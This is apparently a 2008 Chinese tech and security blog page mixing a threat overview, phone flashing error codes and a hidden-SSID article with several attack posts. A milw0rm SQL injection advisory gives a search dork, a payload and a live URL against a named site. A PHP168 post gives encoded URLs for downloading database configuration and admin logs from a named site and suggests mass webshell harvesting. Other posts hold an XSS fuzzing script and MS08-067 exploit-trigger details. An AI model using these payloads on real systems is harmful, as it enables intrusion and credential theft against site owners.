信息安全的常见威胁

2008年10月28日 没有评论 54 views

计算机系统容易受到许多威胁从而造成各种各样损害导致严重损失。这些损害从由于错误而破坏数据库的安全性到火灾摧毁整个计算机中心。损害的原因是多种多样的,例如,看上去可信的员工欺骗系统的行为、外部黑客或粗心的数据录入员。由于很多损害永远也无法被发现,有些机构为了避免公众形象受损所以对损害情况加以掩盖,所以准确的评估计算机安全相关的损害是不可能的。不同的威胁其后果也有所不同:一些是影响数据的机密性或完整性而另一些则影响系统的可用性。这些威胁包括:
1、错误和遗漏
2、欺诈和盗窃
3、员工破坏
4、丧失物理和基础设施的支持
5、有害黑客
6、工业间谍
7、有害代码
8、外国政府间谍
9、对个人隐私的威胁
这里描述了如今系统运行环境中风险的基本情况。所提到的威胁和相关损害是基于其在当今计算环境中的普遍程度和严重程度以及其预期扩展形势而提出的。本清单并不详尽,有些威胁可以是不同领域的组合产物。这里描述的当前常见威胁概况可以为机构研究其自身的威胁环境提供帮助;但是由于这一话题涉及面比较广阔,所以特定系统所遭遇的威胁可能与这里讨论的有所不同 。
为了控制运行信息系统的风险,管理人和用户需要了解系统的缺陷和可能利用缺陷的威胁。对威胁环境的了解使系统管理人得以实施最具成本效益的安全措施。在有些情况下,管理人发现简单容忍预期损害更具有成本效益。这一决策应该基于风险分析的结果。

1. 错误和遗漏

错误和遗漏是数据和系统完整性的重要威胁。这些错误不仅由每天处理几百条交易的数据录入员造成,创建和编辑数据的任何类型的用户都可以造成。许多程序,特别是那些被设计用来供个人计算机用户使用的程序缺乏质量控制手段。但是,即使是最复杂的程序也不可能探测到所有类型的输入错误或遗漏。良好的意识和培训项目可以帮助机构减少错误和遗漏的数量和严重程度。

用户、数据录入员、系统操作员和程序员的工作中经常会出现直接或间接影响安全的错误。在有些情况下,错误是一种威胁,例如数据录入错误或编程错误会使系统崩溃。在另一些情况下,错误导致了缺陷。错误可以在系统生命周期的任何阶段发生。一项由计算机安全顾问、计算机系统安全和隐私咨询委员会的前成员Robert Courtney进行的关于计算机的经济损失的长期调查显示,机构百分之六十五的损失是错误和遗漏造成的。在私营和公共机构中,这种情况基本是一样的。
编程和开发的错误通常被称为“臭虫”,其严重程度从温和到灾难性不等。在1989年美国众议院科学、空间和技术委员会的研究报告《程序中的缺陷》中,调查和监督小组委员会成员对政府系统中此类问题的严重性作出了以下总结:
随着费用的不断增加,对于越来越大、越来越复杂的软件系统的稳定性、成本和准确性的关注也越来越多。随着计算机执行越来越关键的任务,其错误会导致经济混乱、事故,在极端的情况下会导致死亡,所以对此的关注也不断升温。
自从这份研究报告发表以来,软件工业发生了相当大的变化,软件质量有了可观的改善。但是关于软件的“恐怖故事“依然大量流传,报告中分析发现的基本根源和问题依然存在。虽然程序的质量有了很大的改善,减少了每1000行代码中包含的错误量,但是程序的规模同时也在扩大,这在很大程度上抵消了程序质量改进的好处。
安装和维护的错误是安全问题的另一个根源。例如,由美国正直和效率总统委员会(PCIE)在1988年进行的审计中发现,被调查的每十个大型计算机站点中就有一个存在会导致严重安全缺陷的安装和维护错误。

2. 欺诈和盗窃

计算机系统会受到欺诈和盗窃的伤害,这种伤害可以是通过“自动化“了的传统手段进行也可以是通过新的手段进行。例如,有人可能会使用计算机在大型帐户中稍微减少一小部分数量的金钱,期望这个微小的差异不会被调查。金融系统不是这种风险的唯一受害者。控制资源访问的系统(如时间和考勤系统、存货系统、学籍系统以及长途电话系统)都可能成为受害者。

计算机欺诈和盗窃可以是内部人所为也可以是外部人所为。欺诈主要是内部人(如系统的受权用户)所为。1993年《信息周刊》/Ernst&Young公司研究发现百分之九十的首席信息官将“知道过多”信息的员工视为一种威胁 。美国司法部计算机犯罪调查部门指出“内部人构成了计算机系统的最大威胁” 。因为内部人既可以访问受害的计算机系统(包括其控制和流动的资源)又对系统比较熟悉,受权用户在进行计算机犯罪时处于有利的地位。内部人可以是普通用户(如职员)也可以是技术人员。了解机构运行情况的机构的前员工也可能是一种威胁,在其访问权限没有得到适当终止的时侯尤其如此。
另外,对于使用技术手段进行欺诈和盗窃,计算机硬件、和软件都容易被窃取。例如,由Safeware保险公司进行的一项研究发现,在1992年中由于盗窃损失的计算机的价值高达8亿8千2百万美金。

3. 员工破坏

员工最熟悉其雇主的计算机和应用,包括知道何种行为会导致最大的损害、故障或破坏。公共和私营机构中人员的不断缩减造成有一些人对整个机构都很熟悉,这些人可能会保留潜在的系统访问权(如系统帐户没有被及时删除) 。从数量上看,员工破坏事件比盗窃事件要少,但是这种事件造成的损失却很高。
《美国工作场所的破坏》的作者Martin Sprouse报告说,破坏的动机从利他主义到报复不等:
当员工在工作中感到受了欺骗、厌烦、疲倦、受到威胁或背叛的时侯,破坏将被当做获得工作满足感的直接手段,这种手段老板当然是不会同意的 。

4. 丧失物理和基础设施的支持

丧失基础设施的支持包括电力故障(中断、瞬间高压和电压不足)、丧失通信能力、水的中断和泄漏、下水管道问题、缺乏运输服务、火灾、洪水、国内混乱和罢工。这些损害包括如美国世贸中心爆炸和芝加哥隧道洪水这样的激烈事件,也包括像水管破裂这样的普通事件。基础设施的丧失通常导致系统停机,有时结果是在无法预料的。例如,在暴风雪的天气下员工无法上班,而计算机系统依然在工作。

5. 有害黑客

有害黑客这一术语,有时被称为黑客,是指未经授权侵入计算机的人。他们可以是外部人也可以是内部人。黑客行为的增加应该是与政府和企业联网数量的增长有关。1992年一项关于互联网站点(如一个计算机系统)的研究发现每隔几天就会有一次黑客的入侵尝试 。 <
br />黑客的威胁应该被认为是过去的或未来潜在的损害。虽然目前由黑客造成的损失远小于由内部盗窃和破坏造成的损失,但是黑客问题分布广泛而且情况严重。有害黑客行为的一个例子就是直接对公共电话系统的破坏。
美国科学院和国家安全电信咨询委员会的研究表明,黑客的行为不仅限于话费欺诈。也包括侵入电信系统(如交换机)的行为,这种行为造成了系统可用性的降低或中断。虽然还无法得到关于威胁或风险程度的结论,但是这些研究强调黑客的行为会造成严重的破坏 。
黑客威胁受到的关注通常会比其它更普遍更危险的威胁还要多。美国司法部计算机犯罪部门认为造成这种现象的原因有以下三种:
首先,黑客的威胁是最近才遭遇到的威胁。机构一直以来就关注内部员工的行为并能够采用惩戒手段减少这些威胁。但是,这些手段对于防止外部的不受员工规章约束的人来说是无效的。
其次,机构不知道黑客的目的,有些黑客只是浏览信息、有些盗窃信息、有些进行破坏。机构无法确定黑客的目的就会觉得其攻击会很严重。
第三,黑客的攻击会使人们觉得很脆弱,在不知道对方的身份的情况下尤其如此。例如,假如雇佣一名油漆工油漆房屋,有一次他偷窃了珠宝。邻居们不会因此感到威胁,也不会采取措施防备那个油漆工。但是,如果强盗闯入同一间房屋偷走了同样的珠宝,所有的邻居都会觉得自己是受害者并且感到很容易受到攻击。

6. 工业间谍

工业间谍是指从私营企业或政府收集专有数据以达到协助其它公司的目的的行为。工业间谍行为可能是公司为了提高自身的竞争力或政府为了帮助其国内企业所为。由政府派出的外国工业间谍通常被称为经济间谍。因为信息通常在计算机系统中进行处理和存储,所以计算机安全可以帮助防范这种威胁;但是,这无法减少由于受权的员工出卖信息而造成的威胁。
工业间谍在不断增加。1992年一项由美国工业安全学会(ASIS)资助的研究发现,对商业专有信息的盗窃自1985年以来上升了260%。数据指出,在1991年和1992年中所报告的损失有30%涉及到外国的参与。研究还发现,58%的盗窃是现有的正式员工所为。三种危害最大的被盗信息类型是价格信息、制造过程信息和产品开发及规格说明信息。其它被盗信息类型有客户清单、基础研究、销售数据、人事数据、补偿数据、成本数据、建议和战略计划 。
美国中央情报局指出,经济间谍领域中的主要目的是获取与技术相关的信息,但是美国的对外政策以及商品、利益和其它经济信息也是其目标。美国联邦调查局也发现,技术相关信息是主要目标,但是目标还包括企业的专有信息,如谈判地位和其它合同数据。

7. 有害代码

有害代码是指病毒、蠕虫、特洛伊木马、逻辑炸弹和其它“不受欢迎的软件”。有时人们会错误的认为这些只与个人计算机有关,事实上有害代码可以攻击其它平台。
1993年的一项病毒研究发现,已知病毒的数量呈指数速度增长,病毒事件的数量不是这样 。研究断定,病毒已经变得相当普遍,但是这仅仅是“逐步的”。北美商业领域中等到严重的PC-DOS病毒事件接近于每个季度每1000台PC发生一件,假设大多数这样的企业都有基本的防病毒保护,那么受感染的机器将是这个数字的3或4倍 。
有害代码所造成的实际损失主要来自系统的中断和修复系统所花费的人力资源。无论如何,费用是巨大的。

8. 外国政府间谍

在有些场合,可能会出现外国政府情报部门造成的威胁。除了可能的经济间谍之外,外国情报部门可能会为了进一步的情报工作而瞄准非保密系统。有些非保密信息可能对其有价值,如高官的旅行计划、国内防卫和应急准备情况、制造技术、卫星数据、人事和工资数据以及执法、调查和安全文件。具有管辖权的安全官员可以提供有关处理此类威胁的指导。

9. 对个人隐私的威胁

政府、信用局和私人公司积累了大量的关于个人的电子信息,结合计算机监控、处理和聚集大量关于个人信息的能力形成了对个人隐私的威胁。这些信息和技术结合的可能性越来越成为现代信息时代的隐忧。这通常被称为“独裁大哥”。为了防范此类侵害,在过去的很多年中,美国国会颁布了法律,如1974年隐私法案、1988年计算机匹配和隐私法案,它定义了政府所收集的个人信息的合法使用界限。
对个人隐私的威胁来自多个方面。在一些案件中,美国联邦和州雇员将个人信息出售给私人侦探或其它“信息掮客”。1992年发现了一桩类似的案件,美国司法部宣布逮捕了二十多人,他们涉嫌买卖美国社会保障总署(SSA)计算机文件中的信息。在调查中,审计员发现SSA 的雇员没有限制地访问了超过1.3亿条就业记录。另一项调查发现在一个IRS区域中有5%的员工浏览过朋友、亲属和名人的税收记录。有些员工使用这些信息骗取退税,但大多数只是出于好奇。

随着诸多此类案件的曝光,越来越多的人开始关注针对个人隐私的威胁。1993年七月在《MacWorld》杂志中一项特别报告中公布了Louis Harris&Associates公司的民意调查数据,数据显示在1970年有33%的回答者关心个人隐私问题。到了1990年这个数字跃升至79% 。
虽然对个人隐私威胁的程度和及其造成的社会成本难以测量,但是很明显,强大的信息技术有理由使人们担心政府和公司变成“独裁大哥”。增强此类意识是必要的。

分类: 技术文章 标签:

WordPress Media Holder (id) Sql injetion vulnerability

2008年10月27日 没有评论 87 views

-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------

-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------

-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]

分类: 矩阵毒刺 标签: ,

RUN刷机错误代码查询

2008年10月27日 没有评论 77 views
RUN刷机错误代码查询!
转贴,大家刷机出错时可以参考
[202, 204] : CONNECTION *连接错误
This error message will appear when the device is not connected to ActiveSync correctly. Make sure you properly connect the device to the PC through ActiveSync before running RUU.
这个错误信息将出现在设备没有正确的连接。请在运行升级程序之前确定您的设备已经连接好

ERROR [206] : MEMORY ALLOCATION*内存分配 您的内存不够ww
ERROR [280] : UPDATE ERROR*更新错误
When you see any of these error messages, close other running programs on the computer and run RUU again.
当您看到这条信息,清关闭您计算机上运行的其他程序,然后再尝试RUU更新程序
ERROR [208] : FILE OPEN*文件打开错误(?)
ERROR [210] : FILE READ*文件读取错误(?)
These error messages indicate that RUU lacks certain important files and cannot continue with the update. Please get the complete RUU package again.
这些错误信息表明, RUU 缺乏某些重要文件, 无法继续通过更新。再请得到完全RUU刷机包。
_! T' u( \8 @5 y7 M
ERROR [212] : FILE CREATE*文件创建错误(?)
ERROR [214] : FILE WRITE*文件写入错误(?)
ERROR [222, 224] : DEVICE NOT RESPONDING*设备无反应
These error messages will appear when remote access control has failed. Check the ActiveSync connection and try running RUU again.
这些错误信息将出现远程存取控制失败了。检查同步连接和设法再运行RUU 。
坛ERROR [220] : MAIN BATTERY POWER*主要电池功率This error message will appear when the device’s battery power is not sufficient.  Although RUU will instruct you to plug in the AC adapter, it still has to make sure that your device has enough power to upgrade the radio. (Even when you plug in the AC adapter, the device is unable to charge the battery when it is upgrading the radio).3
这个错误信息将出现设备的电池功率不是充足的。请确定你的手机有足够的电量一遍运行升级程序。 意思就是你少于50%电量了
ERROR [238] : FILE READ*文件读取错误www
This error message may appear when, for some unknown reason, the ROM image on the phone is corrupt. Download the whole RUU and try again.
这个错误信息意味着由于未知的错误您的ROM镜像无法在手机上读取运行。请下载全部RUU程序 并再尝试。
ERROR [240] : FILE OPEN*文件打开错误
When this error message appears, check whether the downloaded image is placed in the directory of RUU. If, for some unknown reason, you find that the ROM image is not located in the RUU folder, you have to download the RUU and retry again.
当这个错误信息出现, 请证实被下载的镜像是否被安置在RUU 目录。如果由于一些未知的原因, 您发现ROM 镜像不设置RUU 文件夹, 您必须下载RUU 并且重试。
ERROR [242] : INVALID LANGUAGE*无效语言错误
ERROR [244] : INVALID MODEL ID*无效模拟身份错误
[294] : INVALID VENDER ID*无效销售商身份错误
ERROR [296] :  UPGRADE ONLY*升级唯一(?)
One of these error messages will appear when you use the wrong RUU to do the upgrade. RUU will check if the Model ID and Language ID are compatible with the device. Make sure you use the appropriate RUU tool to upgrade.
K这些错误信息的当中一个将出现您使用错误RUU程序 做升级。RUU 将检查如果模型身份证和语言身份证是否与设备兼容。确定您使用适当的RUU 工具升级。(RUU版本过低造成,比如用RUU2.0.2刷G4机时)
ERROR [246] : DEVICE NOT RESPONDING*设备无反应
This error message indicates that RUU cannot start the update process. Please contact your service provider for assistance.
这个错误信息表明, RUU 无法开始更新过程。请与您的服务提供者联系以便获得协助。(RUU程序错误)

ERROR [248~260] : UPDATE ERROR*更新错误错误
This error occurs when there is an “open port error” before upgrading the CE ROM image. ;
这个错误信息表明 当有 "开放端口错误" 在升级ROM之前。
Solution: You can reset the device and run RUU again. If you still encounter an “OPEN PORT ERROR” again, reset your computer and try again.
解决方法: 请重新设置设备并运行RUU 。如果您仍然遇到"开放端口错误", 请重新设置您的计算机并再次尝试。
ERROR [262] : UPDATE ERROR*更新错误错误 j
This error occurs during the CE ROM code upgrade process.
这个错误发生在 ROM 升级过程期间。
Solution: If this happens, you can just soft-reset the device and run RUU again. The update process will then continue. Pocket PC 解决方法: 如果这种情况发生,软启动设备(手机)并运行RUU 升级程序。之后升级程序将继续运行。
Note: At this stage, the Wince is destroyed; instead, it is in upgrade mode.
注: 在这个状况下, 已写入设备的内容被毁坏(?); 反之, 它是在正常的升级方式下运行。
ERROR [264, 274] : CONNECTION*连接错误
ERROR [302~318] : UPDATE ERROR*升级错误 经过实验 是跳级刷ROM 时候显示的
ERROR [320~328] : INVALID COMMAND*无效命令
These errors seldom occur. However, if one of these errors occur, it could not be recovered and the device had to be sent back to the customer service center. In this case, you have to flash a new ROM code.
这些错误很少发生。但是, 如果这些错误的当中一个发生, 它将不能恢复并且设备必须被送回到客户服务中心。在这种情况下, 您必须换一个新ROM代码。
ERROR [300] :  INVALID UPDATE TOOL*无效更新工具掌
This error message will appear when you use the incorrect RUU version to upgrade. 这个错误信息将出现您使用不正确RUU版本(连接软件?)升级。
ERROR [330] : ROM IMAGE ERROR ROM*镜像错误
This error message will appear when you use the incorrect RUU to upgrade and the image file size is larger than the Flash ROM size. In this case, download the correct RUU version to upgrade.
这个错误信息将出现您使用不正确RUU升级,并且镜像文件大小超过Flash ROM的容量(意思就是ROM太大了 手机容量太小了)。在这种情况下, 请下载正确RUU 版本升级

分类: 技术文章 标签:

Linux Kernel 2.6.27.4

2008年10月27日 没有评论 53 views

Linux Kernel是Linux系统的核心部件,支持Intel、Alpha、PPC、 Sparc、IA-64 、ARM、MIPS、 Amiga、Atari和IBM s/390等,还支持32位大文件系统.而在Intel平台上,物理内存最大支持可以达到64GB.加强对IDE和 SCSI硬件系统的支持,并增强了对 USB设备和3D加速卡的支持.
 

下载:Linux Kernel 2.6.27.4
查看:Changelog
 

分类: 技术文章 标签:

清空代码防止查看源代码

2008年10月27日 没有评论 85 views

<html>
  <head>
  <script language="javascript">
  function clear(){
  Source=document.body.firstChild.data;
  document.open();
  document.close();
  document.title="看不到源代码";
  document.body.innerHTML=Source;
  }
  </script>
  </head>
  <body onload=clear()>
  <!--
  <a href="www.4shell.org">Chinadu`s blog</a>可惜你看不到!
  -->
  </body>
  </html>
  这招算是目前网上公布的防止查看源代码的方法中最好的了,当然了,要看还是办法的,比如在地址栏中输入
  javascript:alert(document.documentElement.outerHTML);

 

分类: 技术文章 标签:

无线网络实战案例查找隐藏的SSID

2008年10月27日 没有评论 140 views

作为网络管理员,安全问题是最不能忽视和回避的,有线网防火墙,IDS,IPS,无线网全都使用安全级别很高的802.1x认证方式,但是如果公司内部人员私自接入一个AP,用于实时的向外界泄露机密文件,或者别有用心的人在公司闲置的网络接口安放非法AP窃取敏感信息,看似固若金汤的网络安全很可能就会因这个“蚁穴”而全盘崩溃。

什么是SSID?SSID(Service Set Identifier),它是用来区分不同的网络或自治域的,简单说,SSID就是一个局域网的ID,最多可以有32个字符。SSID只不过是一个标识,它能和“安全”产生什么关系呢?我们来回想一下我们连接公司AP的过程,点击右下角的图标,选择要连接的SSID,如果需要认证,填写两遍密码,这样就完成了无线网的连接。为什么我能看到SSID?那是因为AP在设置的时候打开了Broadcast SSID选项,目的是方便User的连接,如果黑客想通过安放非法的Rogue AP在网络内来窃取机密数据,相信它不会傻到打开广播,告诉管理员你的网络内有一个“信号质量非常好”的AP存在吧?我们可以大胆的假设,凡是我们见到的不认识的SSID都可能是非法的,凡是我们看不到的隐藏的SSID肯定是非法的!也许现在您的网络内就存在这样一颗罪恶的小AP!

虽然禁用了SSID广播,但是我们仍然可以通过侦听无线数据包“透视”无线网络查找SSID,Airmagnet Laptop就是这样一款专业的无线网测试软件,禁用SSID广播这种小伎俩根本瞒不过它的法眼,Annouced SSID(通告SSID):NO,SSID:test_lab。Airmagnet快速准确的获得了我们需要的信息,而且告诉我们它原本是不广播SSID的,来看看此功能是如何实现的。

首先我们来看一下AP是如何将SSID广播出去的。AP只要接通电源就会发送Beacon frame(信标帧)广播,BI(信标帧的发送间隔)为100毫秒,也就是说每秒钟发送10个信标,来看一下捕捉到的Beacon frame信标帧, 看看它里面都有什么?最基本的信号强度,所在的Channel(信道),当然还有SSID parameter set:”test_lab”等等。没错,如果AP广播SSID,那么信标帧中就会包含SSID的信息就会被添加到中广播出去,这样在PC“查看无线网络”的时候就能看到有这么一个SSID的存在。不广播SSID的Beacon帧是什么样呢?,SSID parameter set:”0000000000000000”, Beacon帧里不再包含SSID信息。“隐身术”就是这么实现的。

我们还再来了解一下PC与AP建立连接的过程吧:

1、 站点在全部13个信道发送探测请求Probe request。

2、 AP在收到请求之后做响应应答Probe response。

3、 站点通过选择应答数据包中信号最强的AP连接。

4、 站点发送身份认证信息。

5、 AP认可了站点的认证信息并注册,建立连接。

对于广播SSID的AP,PC能够从“查看无线网络”看到SSID,点击想连接的SSID实际上就是在发送探测请求,或者叫连接请求,AP“应答”,确认身份,建立连接。不广播SSID的连接过程就稍微的复杂一些了,因为AP不广播SSID,PC是无法知道要向哪个信道去发送连接请求的,所以这时候PC会向全部13个信道发送探测请求,直到收到AP的应答,然后就能进行后面的连接过程了。关键就在于此!我们来看一下NO.8749这个Probe request探测请求帧都包括什么,正如我们所料,这里面SSID parameter set:”test_lab”这个参数——“谁是test_lab?”

值得注意的是,PC一旦开机就会发送包含有曾经连接过的SSID的Probe request请求帧,如果这些数据帧背黑客捕捉到,黑客很可能会伪造一个“你想要的”AP,这就造成了一个危险的安全隐患,这不是本文要讨论的问题。AP在收到请求后的应答包括同样的参数:SSID parameter set:”test_lab”——“我就是你要找的AP test_lab”。剩下的我不用多说大家也应该明白了,通过这一问一答,SSID就得到了!

如果您是一个天天面对着庞大复杂的网络的网络管理员,需要快速准确的获得网络内的信息,Airmagnet Laptop无疑是首选的无线网络管理软件,不要被XP显示的“区域中找不到无线网络”所迷惑,认为网络内根本不存在无线网络设备,俗话说眼见为实,使用专业的无线网测试软件进行周期性测试,才能确保万无一失。安恒公司的无线网测试工程师在现场测试的过程中发现了大量隐藏的非发接入AP,使用Airmagnet Laptop不但可以查找存在的非法AP更能定位非法设备的物理位置,并且能够将捕捉到的数据包保存,用免费的Ethereal协议分析软件就能够对无线网络进行完成更为深入细致的分析。

 

分类: 技术文章 标签:

PHP168整站系统0DAY

2008年10月26日 没有评论 83 views

首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="


程序后台:

http://dabei.org/admin/index.php?iframe=1


Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="  (引号里面的是Base64加密后的)


批量抓webshell:
google,baidu 输入关键字:Powered by PHP168

分类: 技术文章 标签:

邪恶猥琐的web2.0安全

2008年10月26日 没有评论 42 views

web2.0安全概念诞生以来,走向是越来越邪恶猥琐,从csrf到今天的 clickjacking.都可以证明这点.clickjacking其实就是CSS Overlays一个猥琐的应用,这样的技巧应该在优秀的web设计者利用的技巧,但是经过安全人员邪恶的思考就诞生了著名的clickjacking.

关于css带来的一些安全问题,国内外都有一定的观注了.详细可以看看 David Lindsay ,Gareth Heyes,Eduardo Vela Nava [sdc]三人在bluehat8上的演讲:
http://www.thespanner.co.uk/wp-content/uploads/2008/10/the_sexy_assassin2ppt.zip

pp里的exp:http://p42.us/css/ 另外sdc和garethheyes的blog上都有一些想关的介绍:

http://sirdarckcat.blogspot.com/2008/10/about-css-attacks.html

http://www.thespanner.co.uk/2008/10/20/bluehat/

想比下老外对css的研究,国内的由于*A的介入,导致css里xss研究更加深入,hotmail yahoo的xss都是围绕着css里的expression来的,这里有个主要的原因是expression对ie6/ie7都有很好的支持,而且在 css里对于ff2我们也可以通过-moz-binding来实现xss. 所以目前 style 标签[css]里的xss仍然是寻找mail xss的主要途径.

如果大家分析过yahoo等暴光的那些poc就会发现 那些代码比较奇怪,我想可能是通过大量的测试和fuzz跑出来的. 于是我也学着简单的写了一个脚本[这个太简单了,所以没找到什么 :(].

<?php
//xss fuzzing
//by www.80vul.com
//some from Gareth Heyes 's codz :) thx
$string="expression";
$strinj="/*google*/";
//$strinj=str_replace('/',stringToHexString('/','dec'),$strinj);
$strinj=str_replace('/*','/'.stringToHexString('*','dec'),$strinj);

//$strinj=stringToHexString("/*}}'*/",'dec');

$arr=array();
for($i=0,$len=strlen($string);$i<$len;$i++)
{
$stringarr[$i]=substr($string, $i,1);
$destring=substr($string, 0, $i) . $strinj . substr($string, $i, strlen($string));
//print $destring."<br>";
array_push($arr,$destring);
}
array_push($arr,implode($strinj, $stringarr));
//print_r($arr);
//print implode($strinj, $stringarr);

foreach ($arr as $i => $value) {
   // print($arr[$i]."<br>");
   //$xss= '<SPAN STYLE="width:'.$arr[$i].'(alert('.$i.'));">Hello'.$i.'</SPAN>';
   //$xss='<div id="yiv277018259"><div style="width:'.$arr[$i].'(alert('.$i.'));"></div>';
   $xss='hihihihihihi<style>div{background-image:'.$arr[$i].'(alert('.$i.'));}</style>';
  
$file=fopen("xsslog.txt","a+");
fputs($file,"$xss\r\n");
fclose($file);

}

function stringToHexString($str,$type){
$tmp='';
//$rand = rand(1,100);
for($i=0,$len=strlen($str);$i<$len;$i++)
{
$ord=Ord($str[$i]);
if($type=='dec'){$tmp.="&#x00".base_convert($ord,10,16).";";}
if($type=='hex'){$tmp.="&#x".base_convert($ord,10,16).";";}
}
return $tmp;
}

?>

最后附上几个css有关的link:
http://nb.io/hacks/csshttprequest/

http://hi.baidu.com/ycosxhack/blog/item/62ad7c082e74f3930b7b8242.html

http://hi.baidu.com/hi_heige/blog/item/aff71d25097f2c35c9955940.html

分类: 技术文章 标签:

Alexander Sotirov逆出来的MS08-067问题函数伪代码

2008年10月26日 没有评论 48 views

作者:tombkeeper

这个Biu漏洞分配给了小四。小四说,不必着急,一定会有人指着这个扬名立万,可以稍微等等。果不其然,吃完午饭上来,就有人放PoC出来了。

昨天晚上,“Father of China PT”又问我想不想写ms08-067的代码。我说这么赶着写这个干嘛呀,咱们也不急着下大雨。“Father of China PT”说:这个漏洞大家都在盯着,写了就流芳百世了。我说:关键是想流芳百世的人那么多,咱们又不急用,等两天,各种代码肯定会乌泱乌泱铺天盖地而来,就 跟当年ms03-026一样,咱们可以捡个现成。

结果今天早晨发现Alexander Sotirov连逆的代码贴出来了。这段代码很有教学意义,我打算收到我的案例库里去。

顺便说一句,这个Alexander Sotirov下个月会来XCon演讲“Bypassing browser memory protections in Windows Vista”。

From http://www.phreedom.org/blog/2008/decompiling-ms08-067/
Decompiling the vulnerable function for MS08-067
Oct 24, 2008

I spent a couple of hours tonight reversing the vulnerable code responsible for the MS08-067 vulnerability. This bug is pretty interesting, because it is in the same area of code as the MS06-040 buffer overflow, but it was completely missed by all security researchers and Microsoft. It's quite embarassing.

Here's the code of the vulnerable function on Windows XP SP3:

#include <wchar.h>

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash  = NULL;
wchar_t  ch;

// If the path starts with a server name, skip it

if ((path[0] == L'\\' || path[0] == L'/') &&
(path[1] == L'\\' || path[1] == L'/'))
{
p = path+2;

while (*p != L'\\' || *p != L'/') {
if (*p == L'\0')
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L'\\' || path[0] == L'/')
return 0;
}

if (path[0] == L'\0')   // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L'\\') {
// we have a slash

if (current_slash == p-1)   // don't allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L'.' && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L'.' && (p[2] == L'\\' || p[2] == L'\0')) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
//             ^   ^  ^
//             |   |  &p[2]
//             |   |
//             |   current_slash
//             |
//             previous_slash

ch = p[2];

wcscpy(previous_slash, &p[2]);

if (ch&nbs
p;== L'\0')
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we'll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L'\\' && q != path)
q--;

if (*p == L'\\')
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L'\\') {
// we have \.\ or ^.\

if (current_slash != NULL) {
wcscpy(current_slash, &p[1]);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
}
else if (p[1] != L'\0') {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L'\0';
return 1;
}
}

p++;

end_of_loop:
if (*p == L'\0')
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L"\\a\\..\\");
}

分类: 技术文章 标签:

关于MS08-067的一点细节

2008年10月26日 没有评论 64 views

作者:

这个漏洞就不介绍了,已经沸沸扬扬了。

首先milw0rm上那个exp的编译问题,作者在里面放的些小trick很容易fix,主要麻烦的是midl编译idl文件后,在VC6环境下编译可能出现rcpt库的错误。可能是SDK的版本导致的,云舒用最新的SDK(好像是2008?)编译成功了。

其次是触发问题,什么权限都不需要,空连接后就能触发。

ncacn_np:\\\\192.168.152.101[\\pipe\\srvsvc] 直接请求就可以了。

问题还是出在 NetpwPathCanonicalize() 的第二个参数,这个漏洞非常奇特。

首先这个参数的长度不能超过 0x207(unicode)

71BB58F6    81FF 07020000   CMP EDI,207
71BB58FC ^ 0F87 F447FFFF   JA NETAPI32.71BAA0F6   // 如果大于了就直接函数返回了
71BB5902 ^ E9 1247FFFF     JMP NETAPI32.71BAA019

然后会走到一个wcscat的地方,这里没有问题,因为空间是足够的
71BAA019    8D85 E8FBFFFF   LEA EAX,DWORD PTR SS:[EBP-418]
71BAA01F    53              PUSH EBX
71BAA020    50              PUSH EAX
71BAA021    FF15 9810BA71   CALL DWORD PTR DS:[<&msvcrt.wcscat>]     ; msvcrt.wcscat

继续往下会把所有的 "/" 替换为 "\" 这里也无关紧要

然后就走到出问题的函数

71BAA05A    8D85 E8FBFFFF   LEA EAX,DWORD PTR SS:[EBP-418]
71BAA060    50              PUSH EAX
71BAA061    E8 AB020000     CALL NETAPI32.71BAA311

跟进去后很复杂,可以参考下这里的伪代码

http://www.phreedom.org/blog/2008/decompiling-ms08-067/

